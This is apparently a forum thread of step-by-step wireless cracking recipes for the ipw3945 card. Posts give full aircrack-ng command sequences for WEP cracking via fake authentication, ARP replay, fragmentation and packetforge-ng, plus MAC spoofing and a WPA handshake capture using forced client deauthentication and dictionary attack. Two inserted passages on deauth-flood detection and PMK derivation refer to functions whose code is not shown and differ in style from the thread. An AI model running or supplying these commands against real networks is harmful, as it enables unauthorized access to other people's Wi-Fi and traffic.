
Thread: [mini-tuto] Ipw3945 Injection Steps

  1. #1
    Senior Member shamanvirtuel
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default [mini-tuto] Ipw3945 Injection Steps

    Many people have asked me in PM for my steps for ipw3945, so I share them here.... this is working for me....... but don't expect a high injection rate......

    I assume you have the ipwraw drivers installed....

    I assume too that you have updated aircrack to 0.9.1

    UNLOAD IPW3945 DRIVER

    LOAD IPWRAW DRIVER

    ifconfig wifi0 up && ifconfig rtap0 up

    echo '10' > /sys/class/net/wifi0/device/channel (set the channel)

    echo '11' > /sys/class/net/wifi0/device/rate (set the rate)

    airodump-ng -c 10 -w capture rtap0 (sniff with rtap0)

    echo 'XX:XX:XX:XX:XX:XX' > /sys/class/net/wifi0/device/bssid (set ap mac)

    aireplay-ng -1 0 -a APMAC -h OURMAC -e APESSID wifi0

    aireplay-ng -3 -b APMAC -h OURMAC wifi0

    aircrack-ng -z capture*.cap


    These are very basic steps.... hope it helps.........
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  2. #2
    Senior Member PrairieFire
    Join Date
    Apr 2007
    Posts
    705


    Thanks Shaman, I added my confirmed method to the wiki yesterday to hopefully eliminate all these new posts.

    *EDIT* Confirmed: the fragmentation attack and the ARP request replay attack work as long as you run each instance one at a time.

    *Note: There is a problem any time you want to run more than one instance of aireplay-ng at the same time, usually resulting in a hang or freeze. For instance, every time I used aireplay-ng -1 6000 it would hang when trying to use aireplay-ng -2.

    I have had 100% success with fragmentation attack using this method:

    Ipwraw 2.0.0, 0.0.3
    Aircrack-ng 1.0 r659

    Code:
    # Starting at IPWRAW showing wifi0 and rtap0 with iwconfig.
    ifconfig wifi0 down
    # If you are going to use macchanger, use it now.
    macchanger --mac 00:11:22:33:44:55 wifi0

    # nano or echo ' ' > as Shaman posted.
    nano /sys/class/net/wifi0/device/channel
    # Ctrl-X, Yes, Enter (save and exit nano)
    nano /sys/class/net/wifi0/device/rate
    # Change 108 to 2
    # Ctrl-X, Yes, Enter
    nano /sys/class/net/wifi0/device/bssid
    # Remove 00:00:00:00:00:00 and replace with the AP bssid
    # Ctrl-X, Yes, Enter

    ifconfig wifi0 up
    airodump-ng --bssid 00:18:83:1B:68:72 -c 1 -w capture rtap0
    aireplay-ng -1 0 -e "M.A.D." -a 00:18:83:1B:68:72 -h 00:11:22:33:44:55 wifi0
    aireplay-ng -5 -b 00:18:83:1B:68:72 -h 00:11:22:33:44:55 wifi0
    packetforge-ng -0 -a 00:18:83:1B:68:72 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0831-180343.xor -w arp-request
    aireplay-ng -2 -r arp-request wifi0
    aircrack-ng -z capture*.cap
    This will take you 2-5 minutes total to complete.
    Average pps: 497-521

    Anyone that has success with the chop-chop method, please post your version of IPWRAW and Aircrack-ng and exact commands here.
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.

  3. #3
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    5


    Will this work for WPA/WPA2, or just WEP? Off the top of my head, I'd guess and say just WEP.

  4. #4
    Senior Member PrairieFire
    Join Date
    Apr 2007
    Posts
    705


    Quote Originally Posted by Cinder:
        Will this work for WPA/WPA2, or just WEP? Off the top of my head, I'd guess and say just WEP.
    The objective for WPA/WPA2 is to capture the authentication handshake and then use aircrack-ng to crack the pre-shared key.

    Code:
    airodump-ng --bssid 00:18:83:1B:68:72 -c 1 -w psk rtap0
    #Deauthenticate -c the wireless client
    #This should yield the 4-way handshake.
    aireplay-ng -0 1 -a 00:18:83:1B:68:72 -c 00:0F:B5:FD:FB:C2 wifi0
    aircrack-ng -w password.lst -b 00:18:83:1B:68:72 psk*.cap
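The deauthentication step in this post is exactly what a wireless IDS is built to catch: a burst of deauth/disassoc frames between one AP/client pair in a short window. The following is an added example, not from this thread, that runs such a rule over a constructed frame summary (the AP BSSID and client MAC are the ones quoted above; the timestamps and the burst are made up).

```python
import re
from collections import defaultdict, deque

# Constructed frame summary, one frame per line: <seconds> <src> <dst> <subtype>.
# The MACs are the AP and client quoted in this thread; the timing is made up.
SAMPLE_FRAMES = """\
0.00 00:0F:B5:FD:FB:C2 00:18:83:1B:68:72 data
0.10 00:18:83:1B:68:72 00:0F:B5:FD:FB:C2 data
0.50 00:0F:B5:FD:FB:C2 00:18:83:1B:68:72 deauth
1.00 00:18:83:1B:68:72 00:0F:B5:FD:FB:C2 deauth
1.02 00:18:83:1B:68:72 00:0F:B5:FD:FB:C2 deauth
1.04 00:18:83:1B:68:72 00:0F:B5:FD:FB:C2 deauth
1.06 00:18:83:1B:68:72 00:0F:B5:FD:FB:C2 deauth
1.08 00:18:83:1B:68:72 00:0F:B5:FD:FB:C2 deauth
1.10 00:18:83:1B:68:72 00:0F:B5:FD:FB:C2 deauth
30.00 00:18:83:1B:68:72 00:0F:B5:FD:FB:C2 deauth
"""

LINE_RE = re.compile(r"^(\d+\.\d+)\s+(\S+)\s+(\S+)\s+(\w+)$")


def parse_frames(text):
    """Parse into (ts, src, dst, subtype) tuples, skipping malformed lines."""
    frames = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            frames.append((float(m.group(1)), m.group(2).lower(),
                           m.group(3).lower(), m.group(4).lower()))
    return frames


def detect_deauth_floods(frames, window=2.0, threshold=5):
    """Alert once per (src, dst) pair sending >= threshold deauth/disassoc
    frames within `window` seconds. One deauth is a client leaving; a burst
    from the AP's address to one client is a forged-deauth signature (without
    802.11w, management frames are unauthenticated and trivially spoofed)."""
    recent = defaultdict(deque)   # (src, dst) -> recent deauth timestamps
    alerts, alerted = [], set()
    for ts, src, dst, subtype in frames:
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while q and ts - q[0] > window:   # discard frames older than the window
            q.popleft()
        if len(q) >= threshold and (src, dst) not in alerted:
            alerted.add((src, dst))
            alerts.append({"src": src, "dst": dst, "count": len(q),
                           "first": q[0], "last": ts})
    return alerts
```

Enabling 802.11w (protected management frames) on the AP is the mitigation: the client then drops deauth frames that do not carry a valid MIC, so the burst above has no effect.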

  5. #5
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    5


    why not use airolib-ng to speed up cracking time for WPA/WPA2? with several lists totaling 200+MB, would take days without airolib-ng :P

  6. #6
    Senior Member shamanvirtuel
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988


    Yes, it's the best solution, but you need to precompute your hashes, and it could take a long time with huge lists.....

    BUT it really speeds up the whole process, because testing is much faster after precomputing the hashes.........
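To see why the precomputation described in this post is slow, and why a table built for one network is worthless against another (which is why a non-default SSID protects against shared precomputed tables), here is an added example that is not from this thread: it derives the WPA/WPA2-PSK PMK exactly as IEEE 802.11i specifies and checks it against the standard's published test vector (passphrase "password", SSID "IEEE").

```python
import hashlib
import math

# WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
# Because the SSID is the salt, a table of PMKs is only valid for that one SSID.


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit PMK as IEEE 802.11i defines it."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def hmac_calls_per_candidate(dklen: int = 32, iterations: int = 4096,
                             hash_len: int = 20) -> int:
    """Work per candidate passphrase: PBKDF2 emits dklen bytes in blocks of
    hash_len (20 for SHA-1), and each block costs `iterations` HMAC calls.
    32 bytes needs 2 blocks, so 2 * 4096 = 8192 HMAC-SHA1 per candidate; that
    is the cost paid once when precomputing and avoided at every later test."""
    return math.ceil(dklen / hash_len) * iterations


def pmk_depends_on_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase yields different PMKs for two SSIDs,
    i.e. a table precomputed for ssid_a cannot be reused against ssid_b."""
    return wpa_pmk(passphrase, ssid_a) != wpa_pmk(passphrase, ssid_b)
```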
